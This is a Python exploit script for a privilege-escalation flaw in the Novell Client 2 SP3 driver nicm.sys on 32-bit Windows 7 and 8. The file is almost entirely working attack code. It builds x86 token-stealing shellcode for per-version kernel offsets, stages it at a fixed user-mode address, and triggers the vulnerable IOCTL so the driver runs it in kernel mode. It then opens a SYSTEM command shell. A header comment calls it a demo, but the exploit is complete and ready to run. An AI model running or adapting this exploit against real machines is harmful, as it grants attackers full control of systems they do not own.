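# Novell Client 2 SP3 Privilege escalation exploit
# Tested on Windows 7 and 8 (x86) / nicm.sys 3.1.11.0
# Thanks to Master Ryujin :)
# The first public information I have seen about this bug was from Nikita Tarakanov @NTarakanov
# (I am not sure whether there was anything else public)
# Exploit for DEMO purposes :)
# Does not bypass SMEP on Windows 8
# Metasploit module working against Windows 7: http://www.exploit-db.com/exploits/26452/
#
# How it works (x86 only):
#   1. A page is mapped at a fixed user-mode address (0x0d0d0000) and filled with a
#      small fake structure (a chain of pointers into the same page) followed by a
#      token-stealing payload.
#   2. IOCTL 0x143B6B is sent to \\.\nicm with that page as the input buffer. The
#      low two bits of the code are 3 (METHOD_NEITHER), so the driver gets the raw
#      user-mode pointer; it presumably follows the pointer chain and ends up
#      executing the payload in ring 0 (the driver's own logic is not visible here).
#   3. The payload copies the System process (PID 4) token over ours, then a
#      cmd.exe is spawned under the stolen token.
# Caveats: every constant below is for 32-bit Windows 7 / 8 with the tested
# nicm.sys build; wrong EPROCESS/KTHREAD offsets bugcheck the box. The payload
# lives in a user-mode page, so on SMEP-capable hardware Windows 8 bugchecks
# instead of executing it. ctypes' default c_int return type is relied on
# throughout, which is only correct for 32-bit Python.
from __future__ import print_function

from ctypes import *
import os
import struct
import sys
from optparse import OptionParser

# windll only exists on Windows; guarding it lets the payload builders below be
# imported (and unit-tested) elsewhere without changing behaviour on the target.
if os.name == "nt":
    kernel32 = windll.kernel32
    ntdll = windll.ntdll
else:
    kernel32 = ntdll = None

# Win32 / NT constants.
GENERIC_READ = 0x80000000
GENERIC_WRITE = 0x40000000
OPEN_EXISTING = 0x3
INVALID_HANDLE_VALUE = -1        # CreateFile's failure value (NOT 0/NULL); -1 via c_int restype
MEM_COMMIT = 0x1000
MEM_RESERVE = 0x2000
PAGE_EXECUTE_READWRITE = 0x40
STATUS_SUCCESS = 0

DEVICE = b"\\\\.\\nicm"          # device object exposed by nicm.sys
EVIL_IOCTL = 0x00143B6B          # vulnerable IOCTL (METHOD_NEITHER: raw user pointers)
PAYLOAD_BASE = 0x0d0d0000        # fixed user-mode page the driver will dereference/execute
PAYLOAD_SIZE = 0x1000
INPUT_SIZE = 0x14                # bytes of the fake object handed to the driver

# Per-target x86 kernel structure offsets:
#   KPROCESS - KTHREAD.ApcState.Process
#   TOKEN    - EPROCESS.Token
#   UPID     - EPROCESS.UniqueProcessId
#   APLINKS  - EPROCESS.ActiveProcessLinks
OFFSETS = {
    "WIN7": {"KPROCESS": 0x50, "TOKEN": 0xf8, "UPID": 0xb4, "APLINKS": 0xb8},
    "WIN8": {"KPROCESS": 0x80, "TOKEN": 0xec, "UPID": 0xb4, "APLINKS": 0xb8},
}

# The Win7 payload additionally stores our original token pointer here
# (mov [0x20900], ebx). Nothing in this script reads it back; it looks like a
# debugging/restore aid and is kept so the emitted bytes match the original.
WIN7_TOKEN_STASH = 0x20900

SYSTEM_PID = 4


def _u32(value):
    """Little-endian 32-bit immediate / displacement."""
    return struct.pack("<I", value)


def _load_eax_disp(disp):
    """Encode `mov eax, [eax+disp]`.

    Uses the disp8 form when the displacement fits a signed byte (Win7's 0x50:
    8b 40 50) and the disp32 form otherwise (Win8's 0x80: 8b 80 80 00 00 00),
    reproducing the original hand-assembled encodings exactly.
    """
    if disp < 0x80:
        return b"\x8b\x40" + struct.pack("<B", disp)
    return b"\x8b\x80" + _u32(disp)


def build_token_stealer(offs, stash_addr=None):
    """Return the x86 ring-0 token-stealing payload for the given offsets.

    The code locates the current EPROCESS through fs:[0x124] (KPCR.CurrentThread),
    walks ActiveProcessLinks until it finds UniqueProcessId == 4 (System), and
    writes System's Token pointer over the current process' Token. It ends with
    `ret 8`, i.e. it expects to be called with two stack arguments.

    offs:       one of the OFFSETS entries.
    stash_addr: if given, the original token pointer is also stored at this
                absolute address (mov [stash_addr], ebx) before the walk.
    """
    # Loop body is exactly 0x18 bytes; the trailing `jne -0x18` (75 e8) jumps
    # back to its first instruction.
    find_system = (
        b"\x8b\x80" + _u32(offs["APLINKS"]) +               # mov eax, [eax+ActiveProcessLinks]  (Flink)
        b"\x81\xe8" + _u32(offs["APLINKS"]) +               # sub eax, ActiveProcessLinks         (-> next EPROCESS)
        b"\x81\xb8" + _u32(offs["UPID"]) + _u32(SYSTEM_PID) +  # cmp dword [eax+UniqueProcessId], 4
        b"\x75\xe8"                                         # jne find_system
    )

    stash = b""
    if stash_addr is not None:
        stash = b"\x89\x1d" + _u32(stash_addr)              # mov [stash_addr], ebx

    return (
        b"\x52" +                                           # push edx
        b"\x53" +                                           # push ebx
        b"\x33\xc0" +                                       # xor eax, eax
        b"\x64\x8b\x80\x24\x01\x00\x00" +                   # mov eax, fs:[eax+0x124]  (current KTHREAD)
        _load_eax_disp(offs["KPROCESS"]) +                  # mov eax, [eax+ApcState.Process]  (our EPROCESS)
        b"\x8b\xc8" +                                       # mov ecx, eax  (remember our EPROCESS)
        b"\x8b\x98" + _u32(offs["TOKEN"]) +                 # mov ebx, [eax+Token]  (our token)
        stash +
        find_system +
        b"\x8b\x90" + _u32(offs["TOKEN"]) +                 # mov edx, [eax+Token]  (System's token)
        b"\x8b\xc1" +                                       # mov eax, ecx
        b"\x89\x90" + _u32(offs["TOKEN"]) +                 # mov [eax+Token], edx  (we are SYSTEM now)
        b"\x5b" +                                           # pop ebx
        b"\x5a" +                                           # pop edx
        # ret 8 is c2 08 00. The original emitted only c2 08 and relied on the
        # byte that happened to follow in memory being 0; make it explicit.
        b"\xc2\x08\x00"
    )


def build_payload(shellcode, base=PAYLOAD_BASE):
    """Lay out the fake object the driver reads, followed by the shellcode.

    Layout relative to `base` (all pointers are absolute addresses inside the
    same page):
        +0x00  -> base+0x14      (+0x04..+0x13 filler 'A')
        +0x14  -> base+0x18      (+0x18..+0x23 filler 'A')
        +0x24  -> base+0x28
        +0x28  shellcode
    Only the first INPUT_SIZE (0x14) bytes are declared to the driver; the rest
    is reached by following the pointers.
    """
    obj = _u32(base + 0x14) + b"A" * 16
    obj += _u32(base + 0x18) + b"A" * 12
    obj += _u32(base + 0x28)
    return obj + shellcode


def main(argv=None):
    """Parse the target, stage the payload, fire the IOCTL and spawn a shell.

    Exits non-zero when no/unknown target is given, when not running on
    Windows, or when any staging step fails (bad args used to exit 0).
    """
    parser = OptionParser(usage="%prog -o <target>")
    parser.add_option("-o", type="string", action="store", dest="target_os",
                      help="Available target operating systems: WIN7, WIN8")
    options, _ = parser.parse_args(argv)
    target = (options.target_os or "").upper()
    if target not in OFFSETS:
        parser.print_help()
        sys.exit(1)

    if kernel32 is None or ntdll is None:
        print("[-] This exploit only runs on 32-bit Windows.")
        sys.exit(1)

    stash = WIN7_TOKEN_STASH if target == "WIN7" else None
    payload = build_payload(build_token_stealer(OFFSETS[target], stash_addr=stash))

    print("[>] Novell Client 2 SP3 privilege escalation for Windows 7 and Windows 8.")
    print("[>] Finding the driver.")
    device = kernel32.CreateFileA(DEVICE, GENERIC_READ | GENERIC_WRITE, 0, None,
                                  OPEN_EXISTING, 0, None)
    # CreateFile returns INVALID_HANDLE_VALUE (-1), which is truthy, on failure.
    if device == INVALID_HANDLE_VALUE:
        print("[-] Could not open %s (GetLastError=%d); is the Novell Client installed?"
              % (DEVICE.decode("ascii"), kernel32.GetLastError()))
        sys.exit(1)

    print("[>] Allocating memory for our shellcode.")
    base = c_void_p(PAYLOAD_BASE)      # in/out: must come back unchanged
    size = c_ulong(PAYLOAD_SIZE)
    status = ntdll.NtAllocateVirtualMemory(-1, byref(base), 0, byref(size),
                                           MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE)
    if status != STATUS_SUCCESS or base.value != PAYLOAD_BASE:
        print("[-] NtAllocateVirtualMemory failed (NTSTATUS 0x%08x); 0x%08x is not free."
              % (status & 0xFFFFFFFF, PAYLOAD_BASE))
        kernel32.CloseHandle(device)
        sys.exit(1)

    print("[>] Writing the shellcode.")
    written = c_ulong(0)
    # Copy exactly len(payload) bytes: the original copied 0x1000 bytes out of a
    # ~70-byte string, reading far past the end of the Python object. The page is
    # freshly committed (zero-filled), so the rest of it stays 0.
    ok = kernel32.WriteProcessMemory(-1, PAYLOAD_BASE, payload, len(payload), byref(written))
    if not ok or written.value != len(payload):
        print("[-] WriteProcessMemory failed (GetLastError=%d)." % kernel32.GetLastError())
        kernel32.CloseHandle(device)
        sys.exit(1)

    print("[>] Sending IOCTL to the driver.")
    returned = c_ulong(0)
    ok = kernel32.DeviceIoControl(device, EVIL_IOCTL, PAYLOAD_BASE, INPUT_SIZE,
                                  None, 0, byref(returned), None)
    if not ok:
        # The token swap may already have happened even if the driver reports an
        # error afterwards, so warn rather than abort.
        print("[!] DeviceIoControl returned FALSE (GetLastError=%d); the shell may not be SYSTEM."
              % kernel32.GetLastError())
    kernel32.CloseHandle(device)

    print("[>] Dropping to a SYSTEM shell.")
    os.system("cmd.exe /K cd C:\\windows\\system32")


if __name__ == "__main__":
    main()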